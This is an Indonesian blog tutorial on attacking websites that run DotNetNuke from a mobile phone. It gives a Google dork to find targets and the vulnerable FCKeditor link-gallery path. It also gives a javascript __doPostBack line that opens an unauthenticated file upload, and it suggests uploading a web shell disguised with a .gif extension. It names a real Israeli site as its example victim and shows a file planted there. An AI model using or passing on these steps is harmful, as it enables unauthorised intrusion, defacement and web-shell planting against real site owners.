Langsung aja sob,  Kita ikutin tutorial berikut ini.


1.Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit melalui hape . . bAhan2 yg kita butuhkan adalah: 1.operamini browser versi 5.0 ke atas

2.buka operamini v 5.0 anda dan ketik di kolom google search dorknya-> inurl:"/portals/0" And search!!... Nah dapet kan?? Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel. Taruh cursor di link target trus tekan angka 1 di keypad hape anda. Pilih open in new tab. Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab. Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini: http:// securityreason.com/ exploitalert/6234

3.misalkan kita dah dpt targetnya nih... Example site: http://fril.co.il/ portals/0/ cwindex.txt Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn /Providers/ HtmlEditorProviders/ Fck/fcklinkgallery.aspx -> http://site.com/ [path]/portals/0/ a.txt Menjadi -> http://site.com/[path] /Providers/ HtmlEditorProviders/ Fck/ fcklinkgallery.aspx Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik copas lagi. Setelah dapet dan pasti vuln seperti site di bawah ini. http://fril.co.il// Providers/ HtmlEditorProviders/ Fck/ fcklinkgallery.aspx dan buka

4.Setelah site target di buka Pilih : file ( select a file on your site) Tunggu biar loading selesai dan menampilkan 2 kolom: kolom 1 biasanya tulisan 'root' Kolom 2 berisi macam2 file. Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini: javascript:__ doPostBack('ctlURL $cmdUpload','') Lalu klik ok.... Dan Crutz...crutz...crutz...... =)) Kolom yg tdnya berisi 'root' dan 'jenis2 file' Skrg ganti mjd kolom 'root' dan kolom kosong untuk upload file. Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km. SUCCES..!you cAn hacked a web site from mobile phone. Hasilnya seperti ini http://fril.co.il/ portals/0/xadal.txt <100% lwt hape Extensi file yg bisa di upload diantaranya gif,jpg,jpeg,xls,swf,ppt,pda,doc. Trus apa jadinya ya jika kita upload shell dgn extensi gif,atau jpg?< tanya ahlinya saja,atau test ndiri.jgn tanya saia... (emOte benturin kepala ke tembok) Hhhhhhh ... Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab. Siapkan file txt/jpg atau shell.php.gif =)) Desain dulu dr pc trus simpan di hape km. Sapa tau lampu mati atau km sedang berada di tempat yg tdk memungkinkan untuk ol dr pc,bisa iseng2 mencoba seperti di atas

0 komentar:

Posting Komentar